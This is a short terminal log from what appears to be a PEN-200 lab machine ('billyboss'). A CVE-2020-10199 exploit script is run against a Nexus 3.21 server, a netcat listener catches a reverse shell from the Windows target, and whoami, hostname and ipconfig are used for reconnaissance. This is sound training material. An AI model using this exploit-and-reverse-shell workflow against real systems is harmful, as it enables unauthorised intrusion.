CVE-2020-10199
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/billyboss]
└─$ python3 CVE-2020-10199.py
Logging in
Logged in successfully
Command executed
Executing the modified exploit.
Fetched
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/billyboss]
└─$ nnc 8081
listening on [any] 8081 ...
connect to [192.168.45.245] from (UNKNOWN) [192.168.148.61] 63055
Microsoft Windows [Version 10.0.18362.719]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\nathan\Nexus\nexus-3.21.0-05> whoami
whoami
billyboss\nathan
C:\Users\nathan\Nexus\nexus-3.21.0-05> hostname
hostname
billyboss
C:\Users\nathan\Nexus\nexus-3.21.0-05> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.148.61
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.148.254
Initial Foothold established to the target system as the nathan
user via exploiting CVE-2020-10199